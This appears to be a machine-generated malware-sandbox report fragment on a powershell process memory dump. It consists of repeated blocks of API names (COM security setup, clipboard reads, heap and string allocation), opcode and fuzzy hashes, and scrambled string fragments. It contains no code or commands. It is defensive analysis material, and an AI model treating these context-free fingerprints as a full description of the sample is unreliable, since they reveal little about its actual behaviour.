                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                        • Opcode ID: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
                                                                                                                                                                                                                                                        • Instruction ID: d25a5440729caa6a4a41176679ca809818bf9cac461bb09e9bc77660d505e8e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56F0D4B45093019FD314DF29D16871ABBF4FB88304F01991CE49ACB790C7B5AA48CF82
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                        • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                        • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                        • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                        • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                        • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                        • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                                                                                                                                        • API String ID: 0-3492884535
                                                                                                                                                                                                                                                        • Opcode ID: eccaa5771665998240638737fb1425933b1c22948290d11a00596a8013fa42ea
                                                                                                                                                                                                                                                        • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eccaa5771665998240638737fb1425933b1c22948290d11a00596a8013fa42ea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                        • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                        • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                                                                        • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                                                                                                                                        • API String ID: 2525500382-534244583
                                                                                                                                                                                                                                                        • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                        • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                        • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                        • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1095711290
                                                                                                                                                                                                                                                        • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                        • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                        • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                        • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitVariant
                                                                                                                                                                                                                                                        • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                                                                                                                                        • API String ID: 1927566239-3011065302
                                                                                                                                                                                                                                                        • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                        • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                        • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                        • String ID: u
                                                                                                                                                                                                                                                        • API String ID: 3664257935-873558754
                                                                                                                                                                                                                                                        • Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                                                                                                                                                                        • Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E